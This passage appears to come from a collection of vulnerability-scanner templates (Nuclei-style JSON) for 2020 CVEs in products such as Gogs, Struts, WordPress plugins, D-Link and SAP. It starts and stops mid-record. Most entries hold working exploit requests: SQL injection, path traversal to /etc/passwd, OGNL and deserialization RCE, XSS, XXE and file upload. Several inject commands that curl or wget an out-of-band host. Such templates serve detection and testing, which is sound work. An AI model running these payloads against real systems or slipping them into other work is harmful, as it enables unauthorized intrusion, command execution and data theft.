{{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n","GET /repo/create HTTP/1.1\nHost: {{Hostname}}\n","POST /repo/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&user_id=1&repo_name={{randstr}}&private=on&description=&gitignores=&license=&readme=Default&auto_init=on\n","POST /{{username}}/{{randstr}}/settings/hooks/git/post-receive HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&content=%23%21%2Fbin%2Fbash%0D%0Acurl+{{interactsh-url}}\n","GET /{{username}}/{{randstr}}/_new/master HTTP/1.1\nHost: {{Hostname}}\n","POST /{{username}}/{{randstr}}/_new/master HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body_1","words":["content=\"Gogs"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"auth_csrf","group":1,"regex":["name=\"_csrf\" content=\"(.*)\""],"internal":true},{"type":"regex","name":"last_commit","group":1,"regex":["name=\"last_commit\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2020-35848","info":{"name":"Agentejo Cockpit <0.12.0 - NoSQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/auth/newpassword"],"body":"{\n  \"token\": {\n    \"$func\": \"var_dump\"\n  }\n}\n","headers":{"Content-Type":"application/json"},"matchers":[{"type":"regex","part":"body","regex":["string\\([0-9]{1,3}\\)(\\s)?\"rp-([a-f0-9-]+)\""]}]}]},{"id":"CVE-2020-6207","info":{"name":"SAP Solution Manager 7.2 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /EemAdminService/EemAdmin HTTP/1.1\nHost: {{Hostname}}\nSOAPAction: \"\"\nContent-Type: text/xml; charset=UTF-8\nConnection: close\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:adm=\"http://sap.com/smd/eem/admin/\"><soapenv:Header/><soapenv:Body><adm:getAllAgentInfo/></soapenv:Body></soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[":Envelope",":Body",":getAllAgentInfoResponse"],"condition":"and"},{"type":"word","part":"header","words":["text/xml","SAP NetWeaver Application Server"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7136","info":{"name":"HPE Smart Update Manager < 8.5.6 - Remote Unauthorized Access","severity":"critical"},"requests":[{"raw":["POST /session/create HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"hapi\":{\"username\":\"Administrator\",\"password\":\"any_password\",\"language\":\"en\",\"mode\":\"gui\", \"usesshkey\":true, \"privatekey\":\"any_privateky\", \"passphrase\":\"any_passphase\",\"settings\":{\"output_filter\":\"passed\",\"port_number\":\"444\"}}}\n","GET /session/{{sessionid}}/node/index HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["hmessage","Command completed successfully.","node_name"],"condition":"and"}],"extractors":[{"type":"regex","name":"sessionid","group":1,"regex":["\"sessionId\":\"([a-z0-9.]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-7796","info":{"name":"Zimbra Collaboration Suite < 8.8.15 Patch 7 - Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://{{interactsh-url}}%23 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-9425","info":{"name":"rConfig <3.9.4 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/settings.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["defaultNodeUsername","defaultNodePassword"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8191","info":{"name":"Citrix ADC/Gateway - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /menu/stapp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nX-NITRO-USER: xpyZxwy6\n\nsid=254&pe=1,2,3,4,5&appname=%0a</title><script>alert(31337)</script>&au=1&username=nsroot\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</title><script>alert(31337)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-22208","info":{"name":"74cms - ajax_street.php 'x' SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/ajax_street.php?act=alphabet&x=11\ufffd%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5({{num}}),9%20from%20qs_admin#"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2020-14408","info":{"name":"Agentejo Cockpit 0.10.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth/login?to=/92874%27;alert(document.domain)//280"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["redirectTo = '/92874';alert(document.domain)//280';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-28976","info":{"name":"WordPress Canto 1.3.0 - Blind Server-Side Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}","{{BaseURL}}/wp-content/plugins/canto/includes/lib/get.php?subdomain={{interactsh-url}}","{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["null"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-23972","info":{"name":"Joomla! Component GMapFP 3.5 - Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /index.php?option={{component}}&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nReferer: {{BaseURL}}\nConnection: close\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"option\"\n\ncom_gmapfp\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"image1\"; filename=\"{{name}}.html.gif\"\nContent-Type: text/html\n\nprojectdiscovery\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"no_html\"\n\nno_html\n------WebKitFormBoundarySHHbUsfCoxlX1bpS--\n"],"payloads":{"component":["com_gmapfp","comgmapfp"]},"extractors":[{"type":"regex","regex":["window\\.opener\\.(changeDisplayImage|addphoto)\\(\"(.*?)\"\\);"],"part":"body"}]}]},{"id":"CVE-2020-17456","info":{"name":"SEOWON INTECH SLC-130 & SLR-120S - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/login.cgi HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nbrowserTime=081119502020&currentTime=1597159205&expires=Wed%252C%2B12%2BAug%2B2020%2B15%253A20%253A05%2BGMT&Command=Submit&user=admin&password=admin\n","POST /cgi-bin/system_log.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nCommand=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8771","info":{"name":"WordPress Time Capsule < 1.21.16 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nConnection: close\nAccept: */*\n\nIWP_JSON_PREFIX\n","GET /wp-admin/index.php HTTP/1.1\nHost: {{Hostname}}\nConnection: close\nAccept: */*\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<div id=\"adminmenumain\" role=\"navigation\" aria-label=\"Main menu\">","<h1>Dashboard</h1>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["wordpress_[a-z0-9]+=([A-Za-z0-9%]+)"],"part":"header"}]}]},{"id":"CVE-2020-26073","info":{"name":"Cisco SD-WAN vManage Software - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"status","status":[200]},{"type":"regex","regex":["root:.*:0:0:"],"part":"body"}]}]},{"id":"CVE-2020-20300","info":{"name":"WeiPHP 5.0 - SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--+ "],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["52c69e3a57331081823331c4e69d3f2"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-35846","info":{"name":"Agentejo Cockpit < 0.11.2 - NoSQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/auth/check"],"body":"{\n  \"auth\": {\n    \"user\": {\n      \"$eq\": \"admin\"\n    },\n    \"password\": [\n      0\n    ]\n  }\n}\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["password_verify() expects parameter"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13937","info":{"name":"Apache Kylin - Exposed Configuration File","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/kylin/api/admin/config"],"headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["config","kylin.metadata.url"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11530","info":{"name":"WordPress Chop Slider 3 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout 10s\nGET /wp-content/plugins/chopslider/get_script/index.php?id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A) HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/javascript\")","contains(body, \"$(document).ready(function()\")"],"condition":"and"}]}]},{"id":"CVE-2020-23575","info":{"name":"Kyocera Printer d-COPIA253MF - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["root:.*:0:0:","bin:.*:1:1"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-36112","info":{"name":"CSE Bookstore 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["get book price failed! You have an error in your SQL syntax","Can't retrieve data You have an error in your SQL syntax"],"condition":"or"}]}]},{"id":"CVE-2020-35476","info":{"name":"OpenTSDB <=2.4.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://{{interactsh-url}}%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["plotted","timing","cachehit"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24550","info":{"name":"EpiServer Find <13.2.7 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://interact.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: https://interact.sh"]},{"type":"status","status":[301]}]}]},{"id":"CVE-2020-26217","info":{"name":"XStream <1.4.14 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<map>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString>\n      <flags>0</flags>\n      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>\n        <dataHandler>\n          <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>\n            <contentType>text/plain</contentType>\n            <is class='java.io.SequenceInputStream'>\n              <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>\n                <iterator class='javax.imageio.spi.FilterIterator'>\n                  <iter class='java.util.ArrayList$Itr'>\n                    <cursor>0</cursor>\n                    <lastRet>-1</lastRet>\n                    <expectedModCount>1</expectedModCount>\n                    <outer-class>\n                      <java.lang.ProcessBuilder>\n                        <command>\n                          <string>curl</string>\n                          <string>http://{{interactsh-url}}</string>\n                        </command>\n                      </java.lang.ProcessBuilder>\n                    </outer-class>\n                  </iter>\n                  <filter class='javax.imageio.ImageIO$ContainsFilter'>\n                    <method>\n                      <class>java.lang.ProcessBuilder</class>\n                      <name>start</name>\n                      <parameter-types/>\n                    </method>\n                    <name>start</name>\n                  </filter>\n                  <next/>\n                </iterator>\n                <type>KEYS</type>\n              </e>\n              <in class='java.io.ByteArrayInputStream'>\n                <buf></buf>\n                <pos>0</pos>\n                <mark>0</mark>\n                <count>0</count>\n              </in>\n            </is>\n            <consumed>false</consumed>\n          </dataSource>\n          <transferFlavors/>\n        </dataHandler>\n        <dataLen>0</dataLen>\n      </value>\n    </jdk.nashorn.internal.objects.NativeString>\n    <string>test</string>\n  </entry>\n</map>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2020-29164","info":{"name":"PacsOne Server <7.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["<img src=\"\" onerror=\"alert(1);\">1</img>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15227","info":{"name":"Nette Framework - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35984","info":{"name":"Rukovoditel <= 2.7.2 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=users_alerts/users_alerts&action=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2020-17530","info":{"name":"Apache Struts 2.0.0-2.5.25 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2020-35598","info":{"name":"Advanced Comment System 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24589","info":{"name":"WSO2 API Manager <=3.1.0 - Blind XML External Entity Injection","severity":"critical"},"requests":[{"raw":["POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npayload=<%3fxml+version%3d\"1.0\"+%3f><!DOCTYPE+a+[+<!ENTITY+%25+xxe+SYSTEM+\"http%3a//{{interactsh-url}}\">%25xxe%3b]>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["Failed to install the generic artifact type"]}]}]},{"id":"CVE-2020-25213","info":{"name":"WordPress File Manager Plugin - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: multipart/form-data; boundary=------------------------ca81ac1fececda48\n\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"reqid\"\n\n17457a1fe6959\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"cmd\"\n\nupload\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"target\"\n\nl1_Lw\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"mtime[]\"\n\n1576045135\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"poc.txt\"\nContent-Type: text/plain\n\npoc-test\n--------------------------ca81ac1fececda48--\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["poc.txt","added"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9047","info":{"name":"exacqVision Web Service - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/version.web"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["3.10.4.72058","3.12.4.76544","3.8.2.67295","7.0.2.81005","7.2.7.86974","7.4.3.89785","7.6.4.94391","7.8.2.97826","8.0.6.105408","8.2.2.107285","8.4.3.111614","8.6.3.116175","8.8.1.118913","9.0.3.124620","9.2.0.127940","9.4.3.137684","9.6.7.145949","9.8.4.149166","19.03.3.152166","19.06.4.157118","19.09.4.0","19.12.2.0","20.03.2.0","20.06.3.0"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13945","info":{"name":"Apache APISIX - Insufficiently Protected Credentials","severity":"medium"},"requests":[{"raw":["POST /apisix/admin/routes HTTP/1.1\nHost: {{Hostname}}\nX-API-KEY: edd1c9f034335f136f87ad84b625c8f1\nContent-Type: application/json\n\n{\n  \"uri\":\"/{{randstr}}\",\n  \"script\":\"local _M = {} \\n function _M.access(conf, ctx) \\n local os = require('os')\\n local args = assert(ngx.req.get_uri_args()) \\n local f =        assert(io.popen(args.cmd, 'r'))\\n local s = assert(f:read('*a'))\\n ngx.say(s)\\n f:close()  \\n end \\nreturn _M\",\n  \"upstream\":{\n    \"type\":\"roundrobin\",\n    \"nodes\":{\n      \"interact.sh:80\":1\n    }\n  }\n}\n","GET /{{randstr}}?cmd=id HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"action\":\"create\"","\"script\":","\"node\":"],"condition":"and"},{"type":"status","status":[201]}],"extractors":[{"type":"regex","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]}]}]},{"id":"CVE-2020-24186","info":{"name":"WordPress wpDiscuz <=7.0.4 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /?p=1 HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"action\"\n\nwmuUploadFiles\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"wmu_nonce\"\n\n{{wmuSecurity}}\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"wmuAttachmentsData\"\n\nundefined\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"wmu_files[0]\"; filename=\"rce.php\"\nContent-Type: image/png\n\n{{base64_decode('/9j/4WpFeGlmTU0q/f39af39Pv39/f39/f39/f2o/f39/cD9/f39/f39/f39/f/g/UpGSUb9/f39/9tD/f0M/QwK/f0=')}}\n<?php phpinfo();?>\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"postId\"\n\n1\n------WebKitFormBoundary88AhjLimsDMHU1Ak--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["success\":true","fullname","shortname","url"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"wmuSecurity","group":1,"regex":["wmuSecurity\":\"([a-z0-9]+)"],"internal":true,"part":"body"},{"type":"regex","group":1,"regex":["\"url\":\"([a-z:\\\\/0-9-.]+)\""],"part":"body"}]}]},{"id":"CVE-2020-22211","info":{"name":"74cms - ajax_street.php 'key' SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5({{num}}),9%23"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2020-24903","info":{"name":"Cute Editor for ASP.NET 6.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/CuteSoft_Client/CuteEditor/Template.aspx?Referrer=XSS\";><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script></p>","System.Web"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27361","info":{"name":"Akkadian Provisioning Manager 4.50.02 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pme/media/"],"matchers-condition":"and","matchers":[{"type":"word","words":["Index of /pme/media","Parent Directory"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27982","info":{"name":"IceWarp WebMail 11.4.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(1)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-2551","info":{"name":"Oracle WebLogic Server - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/console/login/LoginForm.jsp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["10.3.6.0","12.1.3.0","12.2.1.3","12.2.1.4"],"condition":"or"},{"type":"word","part":"body","words":["WebLogic"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24391","info":{"name":"Mongo-Express - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /checkValid HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndocument=++++++++++++%28%28%29+%3D%3E+%7B%0A++++++++const+process+%3D+clearImmediate.constructor%28%22return+process%3B%22%29%28%29%3B%0A++++++++const+result+%3D+process.mainModule.require%28%22child_process%22%29.execSync%28%22id+%3E+build%2Fcss%2F{{randstr}}.css%22%29%3B%0A++++++++console.log%28%22Result%3A+%22+%2B+result%29%3B%0A++++++++return+true%3B%0A++++%7D%29%28%29++++++++\n","GET /public/css/{{randstr}}.css HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body_3","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]}]}]},{"id":"CVE-2020-25506","info":{"name":"D-Link DNS-320 - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/system_mgr.cgi? HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\nC1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'`\n","POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'` HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2020-14179","info":{"name":"Atlassian Jira Server/Data Center <8.5.8/8.6.0 - 8.11.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/QueryComponent!Default.jspa"],"matchers-condition":"and","matchers":[{"type":"word","words":["{\"searchers\":","\"groups\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11546","info":{"name":"SuperWebmailer 7.21.0.01526 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /mailingupgrade.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nstep=1&Language=de{${system(\"ls\")}}&NextBtn=Weiter+%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ajax_ccea.php","ajax_getemailingactions.php","ajax_getemailtemplates.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15500","info":{"name":"TileServer GL <=3.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["'>\"<svg/onload=confirm('xss')>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-36510","info":{"name":"WordPress 15Zine <3.3.0 - Cross-Site 